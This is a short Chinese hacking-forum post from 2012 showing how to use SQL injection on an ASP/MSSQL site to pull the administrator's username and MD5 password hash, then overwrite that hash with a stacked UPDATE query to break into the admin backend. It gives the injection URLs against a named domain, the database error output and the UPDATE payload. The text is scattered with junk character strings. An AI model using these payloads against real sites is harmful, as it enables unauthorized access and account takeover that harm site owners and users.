经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。9 r. [7 N' W9 k4 V& _5 N9 s
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)- y5 E3 T, A- e& J" t) y1 J
测试如下:
9 u" f* _. t" p7 U8 c- ?9 ~, zhttp://www.tmdsb.com/news.asp?id=1210 t( M4 L5 u* [# w
在地址后输入单引号,显示9 u4 k* o+ A @& Y" `9 i, k/ P
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
; A% \# [7 g( Q! ]- `+ k字符串 ’’’ 之前有未闭合的引号
: c2 @* h* _. m# o( {& A; K/news/tmdws.asp,行63
8 e( w2 x, z G说明没有过滤单引号且数据库是MSSQL.
" T5 I4 C' L4 p" t) z/ H' Kand 1=1正常。and 1=2出错。肯定存在注入8 E; p. r+ z8 S* J( {
接着输入
* f2 m& q. @9 D5 o( n2 N. Q5 H9 P5 Jhttp://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
# h4 Z0 R0 `( Z5 z; J( n. ~5 q得到帐号为:admin! C& y4 ^( l9 B9 E1 M7 C- k2 i0 G
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
+ |( Q; S3 h. h' u) K: X得到密码为:a4716077c2ba075c
) D: @* @% C' ^7 v' a4 d8 s接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
' ?1 x7 R& i$ G, M命令如下 :' g. M, e) w1 e4 m: j3 y) [
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–: X0 W) u! |6 @! ~
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41